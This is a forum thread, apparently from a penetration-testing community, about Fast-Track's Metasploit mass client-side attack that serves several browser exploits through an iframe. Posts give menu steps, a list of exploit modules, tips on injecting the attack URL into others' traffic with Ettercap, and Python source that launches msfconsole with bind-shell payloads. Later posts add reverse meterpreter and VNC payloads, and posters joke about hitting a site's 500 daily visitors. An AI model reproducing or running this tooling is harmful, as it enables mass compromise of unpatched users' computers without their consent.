yeah its pretty cool, i got 3 shells on my unpatched XP SP2
imagin this running on a small site with 500 visitors per day
it's still so easy to get a shell, many people do never update...
Mass Client Side
Metasploit Mass Client-side Attack
This I just a quick post about the script and how it works.
It runs a bunch of Metasploit attacks at once and starts a local websever and puts all the attacks in an iframe.
*Update fast-track.py
Goto the program menu > backtrack > penetration > fasttrack
You can run the script directly from /pentest/fast-track/
*Choose’2. External Hacking
*Choose ‘7. Metasploit Mass Client-Side Attack’
Here is a list of the exploits it runs ( the rc file is called metasploitloadfiles )
windows/browser/ie_createobject
osx/browser/software_update
windows/browser/apple_quicktime_rtsp
windows/browser/winamp_playlist_unc
multi/browser/qtjava_pointer
windows/browser/ibmlotusdomino_dwa_uploadmodule
windows/browser/ani_loadimage_chunksize
What you can do is combine this with a simple Ettercap filter to inject your url at the end of say the body tag. Here is a sample post of a etterfilter.
http://forums.remote-exploit.org/showthread.php?t=12885
My next tutorial will be on replacing all HTTP GET of EXE’s with say a Metasploit payload ;P
yeah its pretty cool, i got 3 shells on my unpatched XP SP2
imagin this running on a small site with 500 visitors per day
it's still so easy to get a shell, many people do never update...
-Google is watching you
-June 1, 2001, Microsoft CEO Steve Ballmer: "Linux is a cancer that attaches itself in an intellectual property sense to everything it touches."
@operat0r:
is there a way to change mass client side payload from shell to meterpreter?
Yes you can... you have to change a few things around in the source... here is how i did it...
open the metaclient.py and replace it with this code... you can find the file in this directory /pentest/fast-track/bin/ftsrcnow you need to open the metasploitloadfile located here /pentest/fast-track.... make your changes and save the fileCode:import pexpect,sys,os try: import psyco psyco.full() except ImportError: pass # Start mass client attack try: import re metapath=file("%s/bin/setup/metasploitconfig.file" % (definepath)).readlines() for line in metapath: metapath=line.rstrip() except Exception: print "Metasploit path not defined, you should run setup.py,\nusing the default for now..." metapath="/pentest/exploits/framework3/" try: #define IP Addr to echo into index.html ipaddr=sys.argv[3] definepath=os.getcwd() print "Setting up Metasploit MSFConsole with various exploits..." #prepfile=file("metasploitloadfile","w") #prepfile.write("use exploit/windows/browser/ie_createobject\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8001\nset URIPATH /\nexploit\nuse exploit/osx/browser/software_update\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8002\nset URIPATH /\nexploit\nuse exploit/windows/browser/apple_quicktime_rtsp\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8003\nset URIPATH /\nexploit\nuse exploit/windows/browser/winamp_playlist_unc\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8007\nset URIPATH /\nexploit\nuse exploit/multi/browser/qtjava_pointer\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8005\nset URIPATH /\nset TARGET 0\nexploit\nuse exploit/multi/browser/qtjava_pointer\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8006\nset URIPATH /\nset TARGET 1\nexploit\nuse exploit/multi/browser/qtjava_pointer\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8008\nset URIPATH /\nset TARGET 2\nexploit\nuse exploit/windows/browser/ibmlotusdomino_dwa_uploadmodule\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8009\nset URIPATH /\nexploit\nuse exploit/windows/browser/ani_loadimage_chunksize\nset PAYLOAD generic/shell_bind_tcp\nset SRVPORT 8000\nset URIPATH /\nexploit\n") #prepfile.close() print "If an exploit succeeds, type sessions -l to list shells and sessions -i <id>\nto interact...\n\n" print "Have someone connect to you on port 80...\n" print "Launching MSFConsole and Exploits...\n" print "Once you see the Metasploit Console launch all the exploits have someone\nconnect to you.." definepath=os.getcwd() launchsploit=os.popen2("""xterm -geometry 100x300x450x500 -T "Fast-Track Metasploit Mass Client Attack" -e "%smsfconsole -r %s/metasploitloadfile" 2> /dev/null""" % (metapath,definepath)) launchhttpserver=os.popen2("""xterm -geometry 100x50 -T "Fast-Track Metasploit Custom HTTP Server" -e "python %s/bin/ftsrc/metahttpserver.py %s" 2> /dev/null""" % (definepath,ipaddr)) pause=raw_input("Press enter to end the Mass Client Attack...") except KeyboardInterrupt: print "\n\nExiting Metasploit Mass Client Attack...\n\n" delfile=os.popen3("del metasploitloadfile") except Exception: print "\n\nExiting Metasploit Mass Client Attack...\n\n" delfile=os.popen3("del metasploitloadfile")
If you know how to use the metasploit console then the rest is up to you
I have used the mass client side attack to pwn Internet explorer many of times. When I try to exploit Firefox it says that in order to exploit the browser you must set the SRVPORT to 80 and URI to /.
I tried changing the SRVPORT for the exploit in metaclient.py.
Is this the correct procedure? and has anyone got this working??
is there any benefit to running this over the browser autopwn script itself?
changes
I'll make some changes later to specify if you want a meterpreter shell, shell bind etc. in the next release, good find, would be cool to add the option to menu/command line/webgui
hahaha
Alright TWO hours later its done :P
I'll update Fast-Track tomorrow with some bug fixes and a new addition to the metasploit mass client attack....
You can now specify payloads you want, I added four so far, if you guys have any other requests let me know, but right now, you can now specify in all modes (interactive, command line, and web gui)
1. Meterpreter Reverse TCP
2. Reverse TCP Shell
3. Meterpreter VNC Reverse Inject
4. Generic Bind Shell
I tested all of them, it was pretty sweeeeet to see a reverse vnc GUI through mass client attack!!!
I'll update tomorrow.
Thanks for the ideas.
ReL
updated
Fast-Track updated.
Pretty sick:
http://www.securestate.com/files/fas...entsideone.jpg
http://www.securestate.com/files/fas...entsidetwo.jpg
Already played around with it. Great work relik - like always...........Fast-Track updated.
Thanks.
Don't eat yellow snow :rolleyes:
Posting Permissions
